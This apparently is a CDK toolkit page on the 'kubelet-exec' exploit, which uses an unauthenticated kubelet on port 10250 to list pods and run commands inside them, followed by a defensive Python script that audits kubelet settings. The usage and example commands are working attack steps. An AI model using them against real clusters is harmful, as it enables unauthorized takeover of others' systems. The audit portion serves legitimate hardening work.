Taking over a K8s cluster via kubelet
Exploit: kubelet-exec
Use the ‘kubelet’ service on the default port ‘10250’ to list the pods running in the cluster. It can also execute system commands in a specified pod and return the output.
By default, the exploit works against unauthorized access. The token is optional.
Usage
./cdk run kubelet-exec (list|exec) <endpoint>/<namespace>/<pod>/<container> <token>
Example
./cdk run kubelet-exec list http://172.16.61.10:10250
./cdk run kubelet-exec exec https://172.16.61.10:10250/kube-system/test1/test "ip addr"
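Whether port 10250 answers without a token depends on the kubelet's authentication and authorization settings. The check below is an added example, not part of CDK: it audits a kubelet configuration in the JSON shape served by the kubelet's /configz endpoint. The function name, finding labels and both sample documents are constructed for illustration.

```python
import json

# Constructed samples: effective kubelet config in the shape returned by
# /configz ({"kubeletconfig": {...}}). All values are made up.
SAMPLE_EXPOSED = json.dumps({"kubeletconfig": {
    "authentication": {"anonymous": {"enabled": True},
                       "webhook": {"enabled": False}},
    "authorization": {"mode": "AlwaysAllow"},
    "readOnlyPort": 10255,
}})
SAMPLE_HARDENED = json.dumps({"kubeletconfig": {
    "authentication": {"anonymous": {"enabled": False},
                       "webhook": {"enabled": True},
                       "x509": {"clientCAFile": "/etc/kubernetes/pki/ca.crt"}},
    "authorization": {"mode": "Webhook"},
    "readOnlyPort": 0,
}})

def audit_kubelet_config(raw):
    """Return findings for settings that leave the kubelet API open."""
    doc = json.loads(raw)
    cfg = doc.get("kubeletconfig", doc)  # accept wrapped or bare config
    authn = cfg.get("authentication", {})
    findings = []
    anon = authn.get("anonymous", {}).get("enabled")
    if anon is True:
        findings.append("anonymous-auth-enabled")
    elif anon is None:
        # Not stated in this document: verify the effective value on the node.
        findings.append("anonymous-auth-unspecified")
    mode = cfg.get("authorization", {}).get("mode")
    if mode == "AlwaysAllow":
        findings.append("authorization-always-allow")
    elif mode is None:
        findings.append("authorization-unspecified")
    # Without webhook token review or a client CA, no caller can be identified.
    if not authn.get("webhook", {}).get("enabled") and \
       not authn.get("x509", {}).get("clientCAFile"):
        findings.append("no-token-or-client-cert-authn")
    if cfg.get("readOnlyPort", 0) != 0:
        findings.append("read-only-port-open")
    return findings

if __name__ == "__main__":
    for name, raw in (("exposed", SAMPLE_EXPOSED), ("hardened", SAMPLE_HARDENED)):
        print(name, audit_kubelet_config(raw) or "ok")
```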
